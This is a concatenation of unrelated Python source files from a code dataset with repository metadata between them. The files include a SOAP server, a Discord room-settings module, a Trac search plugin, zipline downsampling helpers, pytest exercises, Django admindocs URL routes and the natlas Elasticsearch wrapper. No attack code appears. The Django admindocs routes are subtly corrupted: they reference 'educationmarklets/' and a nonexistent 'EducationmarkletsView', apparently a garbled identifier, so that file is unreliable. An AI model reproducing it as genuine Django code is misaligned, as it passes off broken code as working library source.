xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <wsdl:documentation xmlns:wsdl="http://schemas.xmlsoap.org/wsdl/">%(documentation)s</wsdl:documentation> <wsdl:types> <xsd:schema targetNamespace="%(namespace)s" elementFormDefault="qualified" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> </xsd:schema> </wsdl:types> </wsdl:definitions> """ % {'namespace': self.namespace, 'name': self.name, 'documentation': self.documentation} wsdl = SimpleXMLElement(xml) for method, (function, returns, args, doc, response_element_name) in self.methods.items(): # create elements: def parse_element(name, values, array=False, complex=False): if not complex: element = wsdl('wsdl:types')('xsd:schema').add_child('xsd:element') complex = element.add_child("xsd:complexType") else: complex = wsdl('wsdl:types')('xsd:schema').add_child('xsd:complexType') element = complex element['name'] = name if values: items = values elif values is None: items = [('value', None)] else: items = [] if not array and items: all = complex.add_child("xsd:all") elif items: all = complex.add_child("xsd:sequence") for k, v in items: e = all.add_child("xsd:element") e['name'] = k if array: e[:] = {'minOccurs': "0", 'maxOccurs': "unbounded"} if v is None: t = 'xsd:anyType' elif type(v) == list: n = "ArrayOf%s%s" % (name, k) l = [] for d in v: l.extend(d.items()) parse_element(n, l, array=True, complex=True) t = "tns:%s" % n elif type(v) == dict: n = "%s%s" % (name, k) parse_element(n, v.items(), complex=True) t = "tns:%s" % n elif v in TYPE_MAP: t = 'xsd:%s' % TYPE_MAP[v] else: raise TypeError("unknown type %s for marshalling" % str(v)) e.add_attribute('type', t) parse_element("%s" % method, args and args.items()) parse_element(response_element_name, returns and returns.items()) # create messages: for m, e in ('Input', method), ('Output', response_element_name): message = wsdl.add_child('wsdl:message') message['name'] = "%s%s" % (method, m) part = message.add_child("wsdl:part") part[:] = {'name': 'parameters', 'element': 'tns:%s' % e} # create ports portType = wsdl.add_child('wsdl:portType') portType['name'] = "%sPortType" % self.name for method, (function, returns, args, doc, response_element_name) in self.methods.items(): op = portType.add_child('wsdl:operation') op['name'] = method if doc: op.add_child("wsdl:documentation", doc) input = op.add_child("wsdl:input") input['message'] = "tns:%sInput" % method output = op.add_child("wsdl:output") output['message'] = "tns:%sOutput" % method # create bindings binding = wsdl.add_child('wsdl:binding') binding['name'] = "%sBinding" % self.name binding['type'] = "tns:%sPortType" % self.name soapbinding = binding.add_child('soap:binding') soapbinding['style'] = "document" soapbinding['transport'] = "http://schemas.xmlsoap.org/soap/http" for method in self.methods.keys(): op = binding.add_child('wsdl:operation') op['name'] = method soapop = op.add_child('soap:operation') soapop['soapAction'] = self.action + method soapop['style'] = 'document' input = op.add_child("wsdl:input") ##input.add_attribute('name', "%sInput" % method) soapbody = input.add_child("soap:body") soapbody["use"] = "literal" output = op.add_child("wsdl:output") ##output.add_attribute('name', "%sOutput" % method) soapbody = output.add_child("soap:body") soapbody["use"] = "literal" service = wsdl.add_child('wsdl:service') service["name"] = "%sService" % self.name service.add_child('wsdl:documentation', text=self.documentation) port = service.add_child('wsdl:port') port["name"] = "%s" % self.name port["binding"] = "tns:%sBinding" % self.name soapaddress = port.add_child('soap:address') soapaddress["location"] = self.location return wsdl.as_xml(pretty=True) class SOAPHandler(BaseHTTPRequestHandler): def do_GET(self): """User viewable help information and wsdl""" args = self.path[1:].split("?") if self.path != "/" and args[0] not in self.server.dispatcher.methods.keys(): self.send_error(404, "Method not found: %s" % args[0]) else: if self.path == "/": # return wsdl if no method supplied response = self.server.dispatcher.wsdl() else: # return supplied method help (?request or ?response messages) req, res, doc = self.server.dispatcher.help(args[0]) if len(args) == 1 or args[1] == "request": response = req else: response = res self.send_response(200) self.send_header("Content-type", "text/xml") self.end_headers() self.wfile.write(response) def do_POST(self): """SOAP POST gateway""" request = self.rfile.read(int(self.headers.get('content-length'))) # convert xml request to unicode (according to request headers) if sys.version < '3': encoding = self.headers.getparam("charset") else: encoding = self.headers.get_param("charset") request = request.decode(encoding) fault = {} # execute the method response = self.server.dispatcher.dispatch(request, fault=fault) # check if fault dict was completed (faultcode, faultstring, detail) if fault: self.send_response(500) else: self.send_response(200) self.send_header("Content-type", "text/xml") self.end_headers() self.wfile.write(response) class WSGISOAPHandler(object): def __init__(self, dispatcher): self.dispatcher = dispatcher def __call__(self, environ, start_response): return self.handler(environ, start_response) def handler(self, environ, start_response): if environ['REQUEST_METHOD'] == 'GET': return self.do_get(environ, start_response) elif environ['REQUEST_METHOD'] == 'POST': return self.do_post(environ, start_response) else: start_response('405 Method not allowed', [('Content-Type', 'text/plain')]) return ['Method not allowed'] def do_get(self, environ, start_response): path = environ.get('PATH_INFO').lstrip('/') query = environ.get('QUERY_STRING') if path != "" and path not in self.dispatcher.methods.keys(): start_response('404 Not Found', [('Content-Type', 'text/plain')]) return ["Method not found: %s" % path] elif path == "": # return wsdl if no method supplied response = self.dispatcher.wsdl() else: # return supplied method help (?request or ?response messages) req, res, doc = self.dispatcher.help(path) if len(query) == 0 or query == "request": response = req else: response = res start_response('200 OK', [('Content-Type', 'text/xml'), ('Content-Length', str(len(response)))]) return [response] def do_post(self, environ, start_response): length = int(environ['CONTENT_LENGTH']) request = environ['wsgi.input'].read(length) response = self.dispatcher.dispatch(request) start_response('200 OK', [('Content-Type', 'text/xml'), ('Content-Length', str(len(response)))]) return [response] if __name__ == "__main__": dispatcher = SoapDispatcher( name="PySimpleSoapSample", location="http://localhost:8008/", action='http://localhost:8008/', # SOAPAction namespace="http://example.com/pysimplesoapsamle/", prefix="ns0", documentation='Example soap service using PySimpleSoap', trace=True, debug=True, ns=True) def adder(p, c, dt=None): """Add several values""" dt = dt + datetime.timedelta(365) return {'ab': p['a'] + p['b'], 'dd': c[0]['d'] + c[1]['d'], 'dt': dt} def dummy(in0): """Just return input""" return in0 def echo(request): """Copy request->response (generic, any type)""" return request.value dispatcher.register_function( 'Adder', adder, returns={'AddResult': {'ab': int, 'dd': unicode, 'dt': datetime.date}}, args={'p': {'a': int, 'b': int}, 'dt': Date, 'c': [{'d': Decimal}]} ) dispatcher.register_function( 'Dummy', dummy, returns={'out0': str}, args={'in0': str} ) dispatcher.register_function('Echo', echo) if '--local' in sys.argv: wsdl = dispatcher.wsdl() for method, doc in dispatcher.list_methods(): request, response, doc = dispatcher.help(method) if '--serve' in sys.argv: log.info("Starting server...") httpd = HTTPServer(("", 8008), SOAPHandler) httpd.dispatcher = dispatcher httpd.serve_forever() if '--wsgi-serve' in sys.argv: log.info("Starting wsgi server...") from wsgiref.simple_server import make_server application = WSGISOAPHandler(dispatcher) wsgid = make_server('', 8008, application) wsgid.serve_forever() if '--consume' in sys.argv: from .client import SoapClient client = SoapClient( location="http://localhost:8008/", action='http://localhost:8008/', # SOAPAction namespace="http://example.com/sample.wsdl", soap_ns='soap', trace=True, ns="ns0", ) p = {'a': 1, 'b': 2} c = [{'d': '1.20'}, {'d': '2.01'}] response = client.Adder(p=p, dt='2010-07-24', c=c) result = response.AddResult log.info(int(result.ab)) log.info(str(result.dd)) if '--consume-wsdl' in sys.argv: from .client import SoapClient client = SoapClient( wsdl="http://localhost:8008/", ) p = {'a': 1, 'b': 2} c = [{'d': '1.20'}, {'d': '2.01'}] dt = datetime.date.today() response = client.Adder(p=p, dt=dt, c=c) result = response['AddResult'] log.info(int(result['ab'])) log.info(str(result['dd']))
39.882261
120
0.55556
09348d427d83e25f47dedcc3f787fd58db41f760
8,432
py
Python
lib/set_room.py
MuffinAmor/nellie
eace65ac7d7d1730c131345e6e5e5b7d39b078ef
[ "MIT" ]
1
2022-03-12T17:34:05.000Z
2022-03-12T17:34:05.000Z
lib/set_room.py
MuffinAmor/nellie
eace65ac7d7d1730c131345e6e5e5b7d39b078ef
[ "MIT" ]
null
null
null
lib/set_room.py
MuffinAmor/nellie
eace65ac7d7d1730c131345e6e5e5b7d39b078ef
[ "MIT" ]
null
null
null
import json import os import sys os.chdir(r'/') def create_tree(): if not os.path.isfile("Global"): try: os.mkdir("Global") except: pass if not os.path.isfile("Global/rooms"): try: os.mkdir("Global/rooms") except: pass def create_room(name: str, user_id: str): create_tree() if not os.path.isfile("Global/rooms/{}.json".format(name)): data = {'num': name, 'owner': user_id, 'cid': [], 'mods': [], 'banned': [], 'blacklist': [], 'spam': 3, 'lang': 'Not set.', 'desc': 'Not set.', 'topic': "None", 'pictures': True, 'open': False, 'vip': [], 'partner': [] } with open("Global/rooms/{}.json".format(name), "w+") as fp: json.dump(data, fp, indent=4) return True else: return False def edit_special(name: str, id: int, action: str, pos: str): create_tree() if os.path.isfile("Global/rooms/{}.json".format(name)): with open("Global/rooms/{}.json".format(name), encoding="utf-8") as fp: data = json.load(fp) special = list(data[pos]) if action == "append": if id in special: return False else: data[pos].append(id) with open("Global/rooms/{}.json".format(name), "w+") as fp: json.dump(data, fp, indent=4) return True elif action == "remove": if not id in special: return False else: data[pos].remove(id) with open("Global/rooms/{}.json".format(name), "w+") as fp: json.dump(data, fp, indent=4) return True elif action == "clear": data[pos].clear() with open("Global/rooms/{}.json".format(name), "w+") as fp: json.dump(data, fp, indent=4) return True else: return None def edit_banned(name: str, id: int, action: str): create_tree() if os.path.isfile("Global/rooms/{}.json".format(name)): with open("Global/rooms/{}.json".format(name), encoding="utf-8") as fp: data = json.load(fp) banned = list(data['banned']) if action == "append": if id in banned: return False else: data['banned'].append(id) with open("Global/rooms/{}.json".format(name), "w+") as fp: json.dump(data, fp, indent=4) return True elif action == "remove": if not id in banned: return False else: data['banned'].remove(id) with open("Global/rooms/{}.json".format(name), "w+") as fp: json.dump(data, fp, indent=4) return True elif action == "clear": data['banned'].clear() with open("Global/rooms/{}.json".format(name), "w+") as fp: json.dump(data, fp, indent=4) return True else: return None def edit_mods(name: str, id: int, action: str): create_tree() if os.path.isfile("Global/rooms/{}.json".format(name)): with open("Global/rooms/{}.json".format(name), encoding="utf-8") as fp: data = json.load(fp) mods = data['mods'] if action == "append": if id in mods: return False else: data['mods'].append(id) with open("Global/rooms/{}.json".format(name), "w+") as fp: json.dump(data, fp, indent=4) return True elif action == "remove": if not id in mods: return False else: data['mods'].remove(id) with open("Global/rooms/{}.json".format(name), "w+") as fp: json.dump(data, fp, indent=4) return True elif action == "clear": data['mods'].clear() with open("Global/rooms/{}.json".format(name), "w+") as fp: json.dump(data, fp, indent=4) return True else: return None def edit_channel(name: str, id: int, action: str): create_tree() if os.path.isfile("Global/rooms/{}.json".format(name)): with open("Global/rooms/{}.json".format(name), encoding="utf-8") as fp: data = json.load(fp) cid = list(data['cid']) if action == "append": if id in cid: return False else: data['cid'].append(id) with open("Global/rooms/{}.json".format(name), "w+") as fp: json.dump(data, fp, indent=4) return True elif action == "remove": if not id in cid: return False else: data['cid'].remove(id) with open("Global/rooms/{}.json".format(name), "w+") as fp: json.dump(data, fp, indent=4) return True elif action == "clear": data['cid'].clear() with open("Global/rooms/{}.json".format(name), "w+") as fp: json.dump(data, fp, indent=4) return True else: return None def is_connected(id: int, stat: str): try: create_tree() liste = os.listdir(r'/home/niko/data/Nellie/Global/rooms') for name in liste: with open("Global/rooms/{}".format(name), encoding="utf-8") as fp: data = json.load(fp) if id in data[stat]: return name.replace(".json", "") else: return False except Exception as e: exc_type, exc_obj, exc_tb = sys.exc_info() fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1] print(exc_type, fname, exc_tb.tb_lineno) def edit_room(name: str, stat: str, wert): create_tree() if os.path.isfile("Global/rooms/{}.json".format(name)): with open("Global/rooms/{}.json".format(name), encoding="utf-8") as fp: data = json.load(fp) data[stat] = wert with open("Global/rooms/{}.json".format(name), "w+") as fp: json.dump(data, fp, indent=4) return True else: return None def is_owner(id: str): create_tree() liste = os.listdir(r'/home/niko/data/Nellie/Global/rooms') for name in liste: with open("Global/rooms/{}".format(name), encoding="utf-8") as fp: data = json.load(fp) if str(id) == data['owner']: return name.replace(".json", "") else: return False def get_info(name: str, stat: str): create_tree() if os.path.isfile("Global/rooms/{}.json".format(name)): with open("Global/rooms/{}.json".format(name), encoding="utf-8") as fp: data = json.load(fp) return data[stat] else: return None def get_more_info(stat: str): create_tree() a = r"/home/niko/data/Nellie/Global/rooms/" liste = os.listdir(a) all = [] for name in liste: with open("Global/rooms/{}".format(name), encoding="utf-8") as fp: data = json.load(fp) if data[stat]: all.append(name.replace(".json", "")) return all def name_check(name: str): create_tree() a = r"/home/niko/data/Nellie/Global/rooms/" liste = os.listdir(a) all = [] for i in liste: with open("Global/rooms/{}".format(i), encoding="utf-8") as fp: data = json.load(fp) if data['num'] == i.replace(".json", ""): all.append(i.replace(".json", "")) if name in all: return True else: return False def del_room(name: str): create_tree() if os.path.isfile("Global/rooms/{}.json".format(name)): os.remove("Global/rooms/{}.json".format(name)) return True else: return False
32.682171
80
0.480313
3d008e7524687a609fb3858b59eaa5be1ecf6451
1,936
py
Python
files/xmlrpcplugin/0.10/tracrpc/search.py
Puppet-Finland/puppet-trac
ffdf467ba80ff995778c30b0bdc6dc3e7d4e6cd3
[ "BSD-2-Clause" ]
null
null
null
files/xmlrpcplugin/0.10/tracrpc/search.py
Puppet-Finland/puppet-trac
ffdf467ba80ff995778c30b0bdc6dc3e7d4e6cd3
[ "BSD-2-Clause" ]
null
null
null
files/xmlrpcplugin/0.10/tracrpc/search.py
Puppet-Finland/puppet-trac
ffdf467ba80ff995778c30b0bdc6dc3e7d4e6cd3
[ "BSD-2-Clause" ]
null
null
null
from trac.core import * from tracrpc.api import IXMLRPCHandler from trac.Search import ISearchSource try: a = set() except: from sets import Set as set class SearchRPC(Component): """ Search Trac. """ implements(IXMLRPCHandler) search_sources = ExtensionPoint(ISearchSource) # IXMLRPCHandler methods def xmlrpc_namespace(self): return 'search' def xmlrpc_methods(self): yield ('SEARCH_VIEW', ((list,),), self.getSearchFilters) yield ('SEARCH_VIEW', ((list, str), (list, str, list)), self.performSearch) # Others def getSearchFilters(self, req): """ Retrieve a list of search filters with each element in the form (name, description). """ for source in self.search_sources: for filter in source.get_search_filters(req): yield filter def performSearch(self, req, query, filters = []): """ Perform a search using the given filters. Defaults to all if not provided. Results are returned as a list of tuples in the form (href, title, date, author, excerpt).""" from trac.Search import search_terms query = search_terms(query) chosen_filters = set(filters) available_filters = [] for source in self.search_sources: available_filters += source.get_search_filters(req) filters = [f[0] for f in available_filters if f[0] in chosen_filters] if not filters: filters = [f[0] for f in available_filters] self.env.log.debug("Searching with %s" % filters) results = [] for source in self.search_sources: for result in source.get_search_results(req, query, filters): result = map(unicode, result) results.append(['/'.join(req.base_url.split('/')[0:3]) + result[0]] + list(result[1:])) return results
35.2
83
0.619835
72aeaa4a6631dc9e69f1cf348282ffb3310e6ecc
87
py
Python
micApp/apps.py
AkashPushkar/audio-synthesis-webapp
b4053e0cea315d3906c7482249de0c02fcc802d6
[ "MIT" ]
null
null
null
micApp/apps.py
AkashPushkar/audio-synthesis-webapp
b4053e0cea315d3906c7482249de0c02fcc802d6
[ "MIT" ]
7
2020-01-28T22:20:14.000Z
2022-02-09T23:35:32.000Z
micApp/apps.py
AkashPushkar/audio-synthesis-webapp
b4053e0cea315d3906c7482249de0c02fcc802d6
[ "MIT" ]
null
null
null
from django.apps import AppConfig class MicappConfig(AppConfig): name = 'micApp'
14.5
33
0.747126
cf9708372fc17a8548833c24075deaa047e31ba2
1,909
py
Python
zipline/pipeline/downsample_helpers.py
quantrocket-llc/zipline
4eccd1ff3f07addbdc1f9682b608e0584a9b59c6
[ "Apache-2.0" ]
14
2018-02-05T18:38:15.000Z
2022-01-15T21:31:30.000Z
zipline/pipeline/downsample_helpers.py
quantrocket-llc/zipline
4eccd1ff3f07addbdc1f9682b608e0584a9b59c6
[ "Apache-2.0" ]
null
null
null
zipline/pipeline/downsample_helpers.py
quantrocket-llc/zipline
4eccd1ff3f07addbdc1f9682b608e0584a9b59c6
[ "Apache-2.0" ]
8
2020-02-14T04:21:46.000Z
2022-01-30T06:42:50.000Z
""" Helpers for downsampling code. """ from operator import attrgetter from zipline.utils.input_validation import expect_element from zipline.utils.numpy_utils import changed_locations from zipline.utils.sharedoc import ( templated_docstring, PIPELINE_DOWNSAMPLING_FREQUENCY_DOC, ) _dt_to_period = { 'year_start': attrgetter('year'), 'quarter_start': attrgetter('quarter'), 'month_start': attrgetter('month'), 'week_start': attrgetter('week'), } SUPPORTED_DOWNSAMPLE_FREQUENCIES = frozenset(_dt_to_period) expect_downsample_frequency = expect_element( frequency=SUPPORTED_DOWNSAMPLE_FREQUENCIES, ) @expect_downsample_frequency @templated_docstring(frequency=PIPELINE_DOWNSAMPLING_FREQUENCY_DOC) def select_sampling_indices(dates, frequency): """ Choose entries from ``dates`` to use for downsampling at ``frequency``. Parameters ---------- dates : pd.DatetimeIndex Dates from which to select sample choices. {frequency} Returns ------- indices : np.array[int64] An array condtaining indices of dates on which samples should be taken. The resulting index will always include 0 as a sample index, and it will include the first date of each subsequent year/quarter/month/week, as determined by ``frequency``. Notes ----- This function assumes that ``dates`` does not have large gaps. In particular, it assumes that the maximum distance between any two entries in ``dates`` is never greater than a year, which we rely on because we use ``np.diff(dates.<frequency>)`` to find dates where the sampling period has changed. """ if frequency == "week_start": # dates.week is deprecated, uses dates.isocalendar().week dates = dates.isocalendar() return changed_locations( _dt_to_period[frequency](dates), include_first=True )
28.924242
79
0.711891
961bc5e1558cf9f0ca9e1174c5645728f55a54d7
1,029
py
Python
scripts/pyqtgraph-develop/pyqtgraph/graphicsItems/tests/test_GraphicsItem.py
kuldeepaman/tf-pose
8050912c52a7b4f3c8a2656f267d47ba21d093f6
[ "Apache-2.0" ]
null
null
null
scripts/pyqtgraph-develop/pyqtgraph/graphicsItems/tests/test_GraphicsItem.py
kuldeepaman/tf-pose
8050912c52a7b4f3c8a2656f267d47ba21d093f6
[ "Apache-2.0" ]
null
null
null
scripts/pyqtgraph-develop/pyqtgraph/graphicsItems/tests/test_GraphicsItem.py
kuldeepaman/tf-pose
8050912c52a7b4f3c8a2656f267d47ba21d093f6
[ "Apache-2.0" ]
null
null
null
import gc import weakref try: import faulthandler faulthandler.enable() except ImportError: pass import pyqtgraph as pg pg.mkQApp() def test_getViewWidget(): view = pg.PlotWidget() vref = weakref.ref(view) item = pg.InfiniteLine() view.addItem(item) assert item.getViewWidget() is view del view gc.collect() assert vref() is None assert item.getViewWidget() is None def test_getViewWidget_deleted(): view = pg.PlotWidget() item = pg.InfiniteLine() view.addItem(item) assert item.getViewWidget() is view # Arrange to have Qt automatically delete the view widget obj = pg.QtGui.QWidget() view.setParent(obj) del obj gc.collect() assert not pg.Qt.isQObjectAlive(view) assert item.getViewWidget() is None #if __name__ == '__main__': #view = pg.PlotItem() #vref = weakref.ref(view) #item = pg.InfiniteLine() #view.addItem(item) #del view #gc.collect()
21.893617
62
0.628766
bfd20e0979c5d26b50932314489962987fa44fe5
1,325
py
Python
django_cv_env/lib/python3.8/site-packages/django/contrib/admindocs/urls.py
vignif/django_cv
0426b47da82341e676adcf7b441a7b55a3fa2d78
[ "MIT" ]
null
null
null
django_cv_env/lib/python3.8/site-packages/django/contrib/admindocs/urls.py
vignif/django_cv
0426b47da82341e676adcf7b441a7b55a3fa2d78
[ "MIT" ]
null
null
null
django_cv_env/lib/python3.8/site-packages/django/contrib/admindocs/urls.py
vignif/django_cv
0426b47da82341e676adcf7b441a7b55a3fa2d78
[ "MIT" ]
null
null
null
from django.contrib.admindocs import views from django.urls import path, re_path urlpatterns = [ path( '', views.BaseAdminDocsView.as_view(template_name='admin_doc/index.html'), name='django-admindocs-docroot', ), path( 'educationmarklets/', views.EducationmarkletsView.as_view(), name='django-admindocs-educationmarklets', ), path( 'tags/', views.TemplateTagIndexView.as_view(), name='django-admindocs-tags', ), path( 'filters/', views.TemplateFilterIndexView.as_view(), name='django-admindocs-filters', ), path( 'views/', views.ViewIndexView.as_view(), name='django-admindocs-views-index', ), path( 'views/<view>/', views.ViewDetailView.as_view(), name='django-admindocs-views-detail', ), path( 'models/', views.ModelIndexView.as_view(), name='django-admindocs-models-index', ), re_path( r'^models/(?P<app_label>[^\.]+)\.(?P<model_name>[^/]+)/$', views.ModelDetailView.as_view(), name='django-admindocs-models-detail', ), path( 'templates/<path:template>/', views.TemplateDetailView.as_view(), name='django-admindocs-templates', ), ]
25.980392
78
0.579623
15852b1dbf986224c4e1f8a7b474892a647b7c59
2,668
py
Python
07_itertools/test_bite17.py
covrebo/python100
758233f9a52b2ffae8cd5c44e6794aceb1fd1614
[ "MIT" ]
null
null
null
07_itertools/test_bite17.py
covrebo/python100
758233f9a52b2ffae8cd5c44e6794aceb1fd1614
[ "MIT" ]
1
2021-05-11T02:03:56.000Z
2021-05-11T02:03:56.000Z
07_itertools/test_bite17.py
covrebo/python100
758233f9a52b2ffae8cd5c44e6794aceb1fd1614
[ "MIT" ]
null
null
null
import pytest from bite17 import friends_teams friends = 'Bob Dante Julian Martin'.split() @pytest.mark.parametrize('test_input,expected', [ (('Bob', 'Dante'), True), (('Bob', 'Julian'), True), (('Bob', 'Martin'), True), (('Dante', 'Julian'), True), (('Dante', 'Martin'), True), (('Julian', 'Martin'), True), # order does not matter (('Dante', 'Bob'), False), (('Julian', 'Bob'), False), (('Martin', 'Bob'), False), (('Julian', 'Dante'), False), (('Martin', 'Dante'), False), (('Martin', 'Julian'), False), # not with self (('Julian', 'Julian'), False), ]) def test_team_of_two_order_does_not_matter(test_input, expected): """First test lists all combos""" combos = list(friends_teams(friends, team_size=2, order_does_matter=False)) assert len(combos) == 6 if expected: assert test_input in combos else: assert test_input not in combos @pytest.mark.parametrize('test_input,expected', [ (('Bob', 'Dante'), True), (('Dante', 'Julian'), True), (('Dante', 'Martin'), True), # order does matter (('Dante', 'Bob'), True), (('Julian', 'Dante'), True), (('Martin', 'Dante'), True), ]) def test_team_of_two_order_does_matter(test_input, expected): """From here on just test a subset of combos""" combos = list(friends_teams(friends, team_size=2, order_does_matter=True)) assert len(combos) == 12 assert test_input in combos @pytest.mark.parametrize('test_input,expected', [ (('Bob', 'Dante', 'Julian'), True), (('Bob', 'Dante', 'Martin'), True), (('Bob', 'Julian', 'Martin'), True), (('Dante', 'Julian', 'Martin'), True), # order does not matter (('Dante', 'Bob', 'Martin'), False), (('Julian', 'Martin', 'Dante'), False), # no one goes twice (('Dante', 'Dante', 'Martin'), False), ]) def test_team_of_three_order_does_not_matter(test_input, expected): combos = list(friends_teams(friends, team_size=3, order_does_matter=False)) assert len(combos) == 4 if expected: assert test_input in combos else: assert test_input not in combos @pytest.mark.parametrize('test_input,expected', [ (('Bob', 'Dante', 'Julian'), True), (('Bob', 'Dante', 'Martin'), True), (('Bob', 'Julian', 'Martin'), True), (('Dante', 'Julian', 'Martin'), True), # order does matter (('Dante', 'Bob', 'Martin'), True), (('Julian', 'Martin', 'Dante'), True), ]) def test_team_of_three_order_does_matter(test_input, expected): combos = list(friends_teams(friends, team_size=3, order_does_matter=True)) assert len(combos) == 24 assert test_input in combos
32.144578
79
0.609445
a6b46d9c3c572dad37d2c982659f0162f2c5a739
10,770
py
Python
natlas-server/app/elastic.py
thesubtlety/natlas
c7e6afc44244c5e0bb6dcadb3d11a45bd445540d
[ "Apache-2.0" ]
null
null
null
natlas-server/app/elastic.py
thesubtlety/natlas
c7e6afc44244c5e0bb6dcadb3d11a45bd445540d
[ "Apache-2.0" ]
null
null
null
natlas-server/app/elastic.py
thesubtlety/natlas
c7e6afc44244c5e0bb6dcadb3d11a45bd445540d
[ "Apache-2.0" ]
null
null
null
import json import elasticsearch import random import os import subprocess class Elastic: es = None status = False errrorinfo = '' natlasPipelines = ["geoip"] natlasIndices = ["nmap", "nmap_history"] def __init__(self, elasticURL): try: self.es = elasticsearch.Elasticsearch(elasticURL, timeout=5, max_retries=1) if "cluster_name" in self.es.nodes.info(): self.status = True if self.status: for pipeline in self.natlasPipelines: try: self.es.ingest.get_pipeline(pipeline) except elasticsearch.exceptions.NotFoundError: print("{} pipeline not found, initiating...".format(pipeline)) myPipelineInit = {"description": "Add GeoIP info from IP", "processors": [{ "geoip": {"field":"ip"} }] } try: self.es.ingest.put_pipeline(pipeline, body=myPipelineInit) except Exception as e: print("Error adding geoip pipeline, continuing: %s" % e) for index in self.natlasIndices: # initialize nmap and nmap_history and give them mappings for known necessary types if not self.es.indices.exists(index): myIndexInit = {"mappings":{"_doc":{"properties":{ "ctime": {"type":"date"}, "agent": {"type":"keyword"}, "agent_version": {"type":"keyword"}, "scan_reason": {"type":"keyword"}, "scan_start": {"type":"date"}, "scan_stop": {"type":"date"}, "elapsed": {"type":"integer"}, "tags": {"type":"keyword"}, "port_count": {"type":"integer"}, "port_str": {"type":"text"}, "is_up": {"type":"boolean"}, "ip": {"type":"ip"}, "scan_id": {"type":"keyword"}, "nmap_data": {"type": "text"}, "xml_data": {"type": "text", "index":"false"}, "gnmap_data": {"type": "text", "index": "false"}, "httpsheadshot": {"type": "binary"}, "httpsheadshot": {"type": "binary"}, "vncheadshot": {"type":"binary"}, "geoip": {"properties": { "location" : { "type" : "geo_point" } }}, "ports": {"type": "nested", "properties": { "id" : {"type": "keyword"}, "number" : {"type": "integer"}, "protocol": {"type": "keyword"}, "state": {"type": "keyword"}, "reason": {"type": "text"}, "banner": {"type": "text"}, "service": { "properties": { "name": {"type": "keyword"}, "product": {"type": "keyword"}, "version": {"type": "keyword"}, "ostype": {"type": "keyword"}, "conf": {"type": "integer"}, "cpelist": {"type": "text"}, "method": {"type": "text"}, "extrainfo": {"type": "text"}, "tunnel": {"type": "keyword"} } }, "scripts": { "properties": { "id": {"type": "text"}, "output": {"type": "text"} } } }} }}}} self.es.indices.create(index, body=myIndexInit) except elasticsearch.exceptions.NotFoundError: self.errorinfo = 'Cluster Not Found' except: self.errorinfo = 'Could not establish connection' def search(self, query, limit, offset): if not self.status: return 0,[] if query == '': query = 'nmap' try: result = self.es.search(index="nmap", doc_type="_doc", body=\ { "size": limit, "from": offset, "query": { "bool": { "must": [ { "query_string": { "query": query, "fields": ["nmap_data"], "default_operator": "AND" } }, { "term": { "is_up": True } }, { "range": { "port_count": { "gt": 0 } } } ] } }, "sort": { "ctime": { "order": "desc" } } }) except: return 0, [] # search borked, return nothing results = [] # collate results for thing in result['hits']['hits']: results.append(thing['_source']) return result['hits']['total'], results def totalHosts(self): result = self.es.count(index="nmap", doc_type="_doc") return result["count"] def newhost(self, host): if not self.status: return ip = str(host['ip']) # broken in ES6 self.es.index(index='nmap_history', doc_type='_doc', body=host) self.es.index(index='nmap', doc_type='_doc', id=ip, body=host, pipeline='geoip') # Run host enrichment script if enabled if os.environ.get('ENRICH_FILE_PATH'): filename = os.environ.get('ENRICH_FILE_PATH') proc = subprocess.Popen(["python3",filename,ip], stdout=subprocess.PIPE, stderr=subprocess.PIPE) out, err = proc.communicate() if err: print("Error enriching host data | {}, ip: {}".format(filename, ip)) print("{}".format(err)) def gethost(self, ip): if not self.status: return 0,[] result = self.es.search(index='nmap_history', doc_type='_doc', body={"size": 1, "query": {"query_string": { 'query': ip, "fields": ["ip"], "default_operator": "AND"}}, "sort": {"ctime": {"order": "desc"}}}) if result['hits']['total'] == 0: return 0, None return result['hits']['total'], result['hits']['hits'][0]['_source'] def gethost_history(self, ip, limit, offset): if not self.status: return 0,[] result = self.es.search(index='nmap_history', doc_type='_doc', body={"size": limit, "from": offset, "query": { "query_string": {'query': ip, "fields": ["ip"], "default_operator": "AND"}}, "sort": {"ctime": {"order": "desc"}}}) results = [] # collate results for thing in result['hits']['hits']: results.append(thing['_source']) return result['hits']['total'], results def gethost_scan_id(self, scan_id): if not self.status: return 0,[] result = self.es.search(index='nmap_history', doc_type='_doc', body={"size": 1, "query": { "query_string": {'query': scan_id, "fields": ["scan_id"], "default_operator": "AND"}}, "sort": {"ctime": {"order": "desc"}}}) if result['hits']['total'] == 0: return 0, None return result['hits']['total'], result['hits']['hits'][0]['_source'] def delete_scan(self, scan_id): if not self.status: return -1 migrate = False hostResult = self.es.search(index='nmap', doc_type='_doc', body={"size": 1, "query": { "query_string": {'query': scan_id, "fields": ["scan_id"]}}}) if hostResult['hits']['total'] != 0: # we're deleting the most recent scan result and need to pull the next most recent into the nmap index # otherwise you won't find the host when doing searches or browsing ipaddr = hostResult['hits']['hits'][0]['_source']['ip'] twoscans = self.es.search(index="nmap_history", doc_type="_doc", body={"size":2, "query": { "query_string": {"query": ipaddr, "fields": ["ip"]}}, "sort": {"ctime": {"order": "desc"}}}) if len(twoscans['hits']['hits']) != 2: # we're deleting the only scan for this host so we don't need to migrate old scan data into the nmap index migrate = False else: migrate = True result = self.es.delete_by_query(index="nmap,nmap_history", doc_type="_doc", body={"query": { "query_string": {"query": scan_id, "fields": ["scan_id"], "default_operator": "AND"}}}) if migrate: self.es.index(index='nmap', doc_type='_doc', id=ipaddr, body=twoscans['hits']['hits'][1]['_source']) return result["deleted"] def delete_host(self, ip): if not self.status: return -1 deleted = self.es.delete_by_query(index="nmap,nmap_history", doc_type="_doc", body={"query": { "query_string": {'query': ip, "fields": ["ip", "id"], "default_operator": "AND"}}, "sort": {"ctime": {"order": "desc"}}}) return deleted["deleted"]
46.623377
157
0.402878
a6edc395e28af52770d7515daa9f771577b22bf4
3,030
py
Python
HealthPoint.py
serin-delaunay/fleohsis
b4e824eb6e0ccf7aa7cb2435936656399c92553a
[ "MIT" ]
1
2018-06-12T11:46:17.000Z
2018-06-12T11:46:17.000Z
HealthPoint.py
serin-delaunay/fleohsis
b4e824eb6e0ccf7aa7cb2435936656399c92553a
[ "MIT" ]
10
2017-03-06T04:42:58.000Z
2017-03-12T20:48:42.000Z
HealthPoint.py
serin-delaunay/fleohsis
b4e824eb6e0ccf7aa7cb2435936656399c92553a
[ "MIT" ]
null
null
null
